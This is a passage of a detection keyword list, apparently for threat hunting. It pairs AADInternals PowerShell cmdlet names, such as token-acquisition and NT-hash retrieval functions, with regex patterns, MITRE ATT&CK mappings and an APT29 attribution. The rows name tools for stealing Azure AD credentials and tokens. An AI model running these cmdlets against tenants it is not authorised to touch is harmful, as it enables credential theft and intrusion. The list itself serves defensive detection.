tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessPackages*",".{0,1000}Get\-AADIntAccessPackages.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - 
T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessToken*",".{0,1000}Get\-AADIntAccessToken.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessTokenFor*",".{0,1000}Get\-AADIntAccessTokenFor\.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessTokenForAADGraph*",".{0,1000}Get\-AADIntAccessTokenForAADGraph.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessTokenForAADIAMAPI*",".{0,1000}Get\-AADIntAccessTokenForAADIAMAPI.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module 
for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessTokenForAADJoin*",".{0,1000}Get\-AADIntAccessTokenForAADJoin.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessTokenForAccessPackages*",".{0,1000}Get\-AADIntAccessTokenForAccessPackages.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessTokenForAdmin*",".{0,1000}Get\-AADIntAccessTokenForAdmin.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" 
"*Get-AADIntAccessTokenForAzureCoreManagement*",".{0,1000}Get\-AADIntAccessTokenForAzureCoreManagement.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessTokenForAzureMgmtAPI*",".{0,1000}Get\-AADIntAccessTokenForAzureMgmtAPI.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessTokenForCloudShell*",".{0,1000}Get\-AADIntAccessTokenForCloudShell.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessTokenForEXO*",".{0,1000}Get\-AADIntAccessTokenForEXO.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - 
TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessTokenForEXOPS*",".{0,1000}Get\-AADIntAccessTokenForEXOPS.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessTokenForIntuneMDM*",".{0,1000}Get\-AADIntAccessTokenForIntuneMDM.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessTokenForMDM*",".{0,1000}Get\-AADIntAccessTokenForMDM.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessTokenForMSCommerce*",".{0,1000}Get\-AADIntAccessTokenForMSCommerce.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - 
T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessTokenForMSGraph*",".{0,1000}Get\-AADIntAccessTokenForMSGraph.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessTokenForMSPartner*",".{0,1000}Get\-AADIntAccessTokenForMSPartner.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessTokenForMySignins*",".{0,1000}Get\-AADIntAccessTokenForMySignins.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" 
"*Get-AADIntAccessTokenForOfficeApps*",".{0,1000}Get\-AADIntAccessTokenForOfficeApps.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessTokenForOneDrive*",".{0,1000}Get\-AADIntAccessTokenForOneDrive.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessTokenForOneNote*",".{0,1000}Get\-AADIntAccessTokenForOneNote.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessTokenForOneOfficeApps*",".{0,1000}Get\-AADIntAccessTokenForOneOfficeApps.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - 
TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessTokenForPTA*",".{0,1000}Get\-AADIntAccessTokenForPTA.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessTokenForSARA*",".{0,1000}Get\-AADIntAccessTokenForSARA.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessTokenForSPO*",".{0,1000}Get\-AADIntAccessTokenForSPO.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessTokenForTeams*",".{0,1000}Get\-AADIntAccessTokenForTeams.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - 
T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessTokenForWHfB*",".{0,1000}Get\-AADIntAccessTokenForWHfB.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessTokenUsingAdminAPI*",".{0,1000}Get\-AADIntAccessTokenUsingAdminAPI.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccessTokenUsingIMDS*",".{0,1000}Get\-AADIntAccessTokenUsingIMDS.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" 
"*Get-AADIntAccessTokenWithRefreshToken*",".{0,1000}Get\-AADIntAccessTokenWithRefreshToken.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAccountSkus*",".{0,1000}Get\-AADIntAccountSkus.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntADFSPolicyStoreRules*",".{0,1000}Get\-AADIntADFSPolicyStoreRules.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAdminPortalAccessTokenUsingCBA*",".{0,1000}Get\-AADIntAdminPortalAccessTokenUsingCBA.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - 
TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntADUserNTHash*",".{0,1000}Get\-AADIntADUserNTHash.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAdUserNTHash*",".{0,1000}Get\-AADIntAdUserNTHash.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntADUserThumbnailPhoto*",".{0,1000}Get\-AADIntADUserThumbnailPhoto.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAgentProxyGroups*",".{0,1000}Get\-AADIntAgentProxyGroups.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - 
T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAzureADFeature*",".{0,1000}Get\-AADIntAzureADFeature.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAzureADFeatures*",".{0,1000}Get\-AADIntAzureADFeatures.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAzureADPolicies*",".{0,1000}Get\-AADIntAzureADPolicies.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAzureAuditLog*",".{0,1000}Get\-AADIntAzureAuditLog.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering 
Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAzureClassicAdministrators*",".{0,1000}Get\-AADIntAzureClassicAdministrators.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAzureDiagnosticSettings*",".{0,1000}Get\-AADIntAzureDiagnosticSettings.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAzureDirectoryActivityLog*",".{0,1000}Get\-AADIntAzureDirectoryActivityLog.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" 
"*Get-AADIntAzureInformation*",".{0,1000}Get\-AADIntAzureInformation.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAzureResourceGroups*",".{0,1000}Get\-AADIntAzureResourceGroups.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAzureRoleAssignmentId*",".{0,1000}Get\-AADIntAzureRoleAssignmentId.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAzureSignInLog*",".{0,1000}Get\-AADIntAzureSignInLog.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation 
tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAzureSubscriptions*",".{0,1000}Get\-AADIntAzureSubscriptions.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAzureTenants*",".{0,1000}Get\-AADIntAzureTenants.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAzureVMRdpSettings*",".{0,1000}Get\-AADIntAzureVMRdpSettings.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation 